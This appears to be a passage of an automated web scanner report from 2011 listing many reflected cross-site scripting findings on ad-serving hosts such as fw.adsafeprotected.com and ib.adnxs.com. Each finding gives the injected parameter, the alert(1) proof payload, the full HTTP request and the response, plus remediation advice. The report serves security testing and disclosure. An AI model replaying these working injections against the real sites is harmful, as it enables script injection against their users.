HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=8FAD174036125319C01B9C5766443D98; Path=/ Content-Type: text/html Date: Thu, 11 Aug 2011 22:40:32 GMT Connection: close
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4a8ed"-alert(1)-"9ea1d2dfa2b was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898?4a8ed"-alert(1)-"9ea1d2dfa2b HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=447DFF1973A285E7F493DBCC94B1C93F; Path=/ Content-Type: text/html Date: Thu, 11 Aug 2011 22:40:32 GMT Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5dbf5"-alert(1)-"12e0cf7b4e4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com5dbf5"-alert(1)-"12e0cf7b4e4/10449/9003/ca?pid=hp01&aid=hp02&cid=68442935&c=cachebuster&w=728&h=90&plc=tl&js=10 HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=F75D51DC4B4224390CEB316035A9D89F; Path=/ Content-Type: text/javascript Date: Thu, 11 Aug 2011 22:40:33 GMT Connection: close
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad3ea"-alert(1)-"7e31539aea6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com/10449ad3ea"-alert(1)-"7e31539aea6/9003/ca?pid=hp01&aid=hp02&cid=68442935&c=cachebuster&w=728&h=90&plc=tl&js=10 HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=E2E66ABFF09E577612E681211EC6511C; Path=/ Content-Type: text/javascript Date: Thu, 11 Aug 2011 22:40:33 GMT Connection: close
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64c73"-alert(1)-"311e6476895 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com/10449/900364c73"-alert(1)-"311e6476895/ca?pid=hp01&aid=hp02&cid=68442935&c=cachebuster&w=728&h=90&plc=tl&js=10 HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=DD246A7FD505C11EEE9444741AC8FB97; Path=/ Content-Type: text/javascript Date: Thu, 11 Aug 2011 22:40:34 GMT Connection: close
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c499e"-alert(1)-"980593a7dc0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com/10449/9003/cac499e"-alert(1)-"980593a7dc0?pid=hp01&aid=hp02&cid=68442935&c=cachebuster&w=728&h=90&plc=tl&js=10 HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=4D86B6ABDD40B4BAD1D2FFE8C8A73D0F; Path=/ Content-Type: text/javascript Date: Thu, 11 Aug 2011 22:40:35 GMT Connection: close
The value of the aid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6391"-alert(1)-"3ae5a3e1f48 was submitted in the aid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com/10449/9003/ca?pid=hp01&aid=hp02c6391"-alert(1)-"3ae5a3e1f48&cid=68442935&c=cachebuster&w=728&h=90&plc=tl&js=10 HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=3AC63BF3BBDDE3C9EFF4C4CD0AE1B7CC; Path=/ Content-Type: text/javascript Date: Thu, 11 Aug 2011 22:40:29 GMT Connection: close
The value of the c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24df3"-alert(1)-"556a380bc89 was submitted in the c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com/10449/9003/ca?pid=hp01&aid=hp02&cid=68442935&c=cachebuster24df3"-alert(1)-"556a380bc89&w=728&h=90&plc=tl&js=10 HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=B7E6542086595D32D2BCFC7C7C5E6B4D; Path=/ Content-Type: text/javascript Date: Thu, 11 Aug 2011 22:40:30 GMT Connection: close
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d874e"-alert(1)-"8f76ac85700 was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com/10449/9003/ca?pid=hp01&aid=hp02&cid=68442935d874e"-alert(1)-"8f76ac85700&c=cachebuster&w=728&h=90&plc=tl&js=10 HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=B5DDC06E495E10B8505F32832C209348; Path=/ Content-Type: text/javascript Date: Thu, 11 Aug 2011 22:40:30 GMT Connection: close
The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f43c4"-alert(1)-"07d3b495901 was submitted in the h parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com/10449/9003/ca?pid=hp01&aid=hp02&cid=68442935&c=cachebuster&w=728&h=90f43c4"-alert(1)-"07d3b495901&plc=tl&js=10 HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=E375663616B9246AF1F71BE2B9C988C5; Path=/ Content-Type: text/javascript Date: Thu, 11 Aug 2011 22:40:30 GMT Connection: close
The value of the js request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1aaaf"-alert(1)-"261704261b0 was submitted in the js parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com/10449/9003/ca?pid=hp01&aid=hp02&cid=68442935&c=cachebuster&w=728&h=90&plc=tl&js=101aaaf"-alert(1)-"261704261b0 HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=E476E6E84728F9F552CC72B161900110; Path=/ Content-Type: text/javascript Date: Thu, 11 Aug 2011 22:40:32 GMT Connection: close
1.252. http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://fw.adsafeprotected.com
Path:
/rjss/choices.truste.com/10449/9003/ca
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd534"-alert(1)-"dfd8c583060 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com/10449/9003/ca?pid=hp01&aid=hp02&cid=68442935&c=cachebuster&w=728&h=90&plc=tl&js=10&cd534"-alert(1)-"dfd8c583060=1 HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=2DE02032DF9BCDEFD06A9FDA12B4EB11; Path=/ Content-Type: text/javascript Date: Thu, 11 Aug 2011 22:40:32 GMT Connection: close
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 953fd"-alert(1)-"fc853a13bb5 was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com/10449/9003/ca?pid=hp01953fd"-alert(1)-"fc853a13bb5&aid=hp02&cid=68442935&c=cachebuster&w=728&h=90&plc=tl&js=10 HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=AB745F49A27F9C118C4B77DBDA5CBC4D; Path=/ Content-Type: text/javascript Date: Thu, 11 Aug 2011 22:40:28 GMT Connection: close
The value of the plc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d49fd"-alert(1)-"4081b4f6950 was submitted in the plc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com/10449/9003/ca?pid=hp01&aid=hp02&cid=68442935&c=cachebuster&w=728&h=90&plc=tld49fd"-alert(1)-"4081b4f6950&js=10 HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=8FF3442D093E020CD38F3DBB93D3DD6A; Path=/ Content-Type: text/javascript Date: Thu, 11 Aug 2011 22:40:31 GMT Connection: close
The value of the w request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62f52"-alert(1)-"d0677c8a65a was submitted in the w parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com/10449/9003/ca?pid=hp01&aid=hp02&cid=68442935&c=cachebuster&w=72862f52"-alert(1)-"d0677c8a65a&h=90&plc=tl&js=10 HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=7DB9AE13B83BA6BB678DE1EE54E88BED; Path=/ Content-Type: text/javascript Date: Thu, 11 Aug 2011 22:40:30 GMT Connection: close
The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe0a5'%3balert(1)//ef5e54119c7 was submitted in the redir parameter. This input was echoed as fe0a5';alert(1)//ef5e54119c7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ptj?member=988&inv_code=ns.informit&size=728x90&imp_id=ns-10313865974_1314813273,12244bc34a8b1dc&referrer=http%3A%2F%2Fwww.informit.com%2Findex.aspx%3F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fns.informit%2Fhomepage%3Bnet%3Dns%3Bu%3D%2Cns-10313865974_1314813273%2C12244bc34a8b1dc%2Citdeweb%2Cax.{PRICEBUCKET}%3B%3Bppos%3Datf%3Bkw%3D%3Btile%3D1%3Bcmw%3Dnurl%3Bsz%3D728x90%3Bnet%3Dns%3Bord1%3D418181%3Bcontx%3Ditdeweb%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3D%3Bord%3D3538776447530836%3F%3Ffe0a5'%3balert(1)//ef5e54119c7 HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.informit.com/index.aspx User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Thu, 01-Sep-2011 17:55:11 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=6422714091563403120; path=/; expires=Tue, 29-Nov-2011 17:55:11 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb14588=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: icu=ChIIzagDEAoYCCAIKAgw_er58gQKEgjAqQMQChgRIBEoETD_6vnyBBD_6vnyBBgY; path=/; expires=Tue, 29-Nov-2011 17:55:11 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb210431=lbMRZkI/7Zw@!%#Qz[m]b91JX?enc=Z2ZmZmZm-j9OYhBYObT2PwAAAAAAAPg_TmIQWDm09j9mZmZmZmb6P9-RjzZyG0FacEeI8W8QIll_dV5OAAAAADgbCADcAwAAZAAAAAIAAAC2awgANCcBAAEAAABVU0QAVVNEANgCWgA7JQAAnhQBAgUCAQUAAAAAYh7Y6wAAAAA.&tt_code=ns.informit&udj=uf%28%27a%27%2C+27%2C+1314813311%29%3Buf%28%27g%27%2C+1079%2C+1314813311%29%3Buf%28%27r%27%2C+551862%2C+1314813311%29%3Bppv%2882%2C+%276503509514255307231%27%2C+1314813311%2C+1325181311%2C+66647%2C+75572%29%3Bppv%2884%2C+%276503509514255307231%27%2C+1314813311%2C+1325181311%2C+66647%2C+75572%29%3Bppv%2811%2C+%276503509514255307231%27%2C+1314813311%2C+1325181311%2C+66647%2C+75572%29%3Bppv%2882%2C+%276503509514255307231%27%2C+1314813311%2C+1325181311%2C+66647%2C+75572%29%3Bppv%2884%2C+%276503509514255307231%27%2C+1314813311%2C+1325181311%2C+66647%2C+75572%29%3B&cnd=!ByLNcwjXiAQQttchGAAgtM4EMAE4u0pAAEhkULi2IFgAYHhoAHAAeACAAQCIAQCQAQGYAQGgAQKoAQOwAQC5AWdmZmZmZvo_wQFnZmZmZmb6P8kBmpmZmZmZ8T_ZAQAAAAAAAPA_4AHhHQ..&ccd=!6AQyKAjXiAQQttchGLTOBCAA&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E66647&media_subtypes=1; path=/; expires=Thu, 01-Sep-2011 17:55:11 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG7]PCxrx)0s]#%2L_'x%SEV/hnJip4FV-GK]#_gAU+]VCVUo?#tv8d''iQ#; path=/; expires=Tue, 29-Nov-2011 17:55:11 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Wed, 31 Aug 2011 17:55:11 GMT Content-Length: 329
The value of the imp_rvr_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2c8a"%3balert(1)//155cfbc0af0 was submitted in the imp_rvr_id parameter. This input was echoed as b2c8a";alert(1)//155cfbc0af0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4056"%3balert(1)//963aa907825 was submitted in the mpck parameter. This input was echoed as d4056";alert(1)//963aa907825 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
document.write( " <div id=\"foldcheck254966832407\">" ); var rvr_id=254966832407; var mpserv; var mpi="img-cdn.mediaplex.com/0/";
...[SNIP]... U38=9&ir_DAP_U31=u&ir_DAP_U26=true&ir_DAP_U25=false&ir_DAP_U24=false&ir_DAP_U33=4&ir_DAP_I105=0&ir_DAP_U34=1&ir_DAP_U32=C&ir_DAP_I106=0&ir_DAP_U35=02018-0250&rvr_id=254966832407&imp_rvr_id=254966832407d4056";alert(1)//963aa907825"; var mpcke="<mpcke/> ...[SNIP]...
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b198d"%3balert(1)//6c031280ac6 was submitted in the mpvc parameter. This input was echoed as b198d";alert(1)//6c031280ac6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
document.write( " <div id=\"foldcheck254966832407\">" ); var rvr_id=254966832407; var mpserv; var mpi="img-cdn.mediaplex.com/0/";
...[SNIP]... advertising.com%2Fclick%2Fsite%3D0000805764%2Fmnum%3D0001017406%2Fcstr%3D2758506%3D_4e445926%2C6612185646%2C805764%5E1017406%5E1183%5E0%2C1_%2Fxsxdata%3D%24XSXDATA%2Fbnum%3D2758506%2Foptn%3D64%3Ftrg%3Db198d";alert(1)//6c031280ac6"; var bangmpvc="http%3A%2F%2Fib.adnxs.com%2Fclick%3FAAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAAHF4m-jACh18-HCZRD1jHzErWUROAAAAAJVwCABkAAAAZAAAAAIAAADkaggAh7wAAAEAAABVU0QAVVNE ...[SNIP]...
The value of the imp_rvr_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 976a0"%3balert(1)//3e2ec7b7f61 was submitted in the imp_rvr_id parameter. This input was echoed as 976a0";alert(1)//3e2ec7b7f61 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
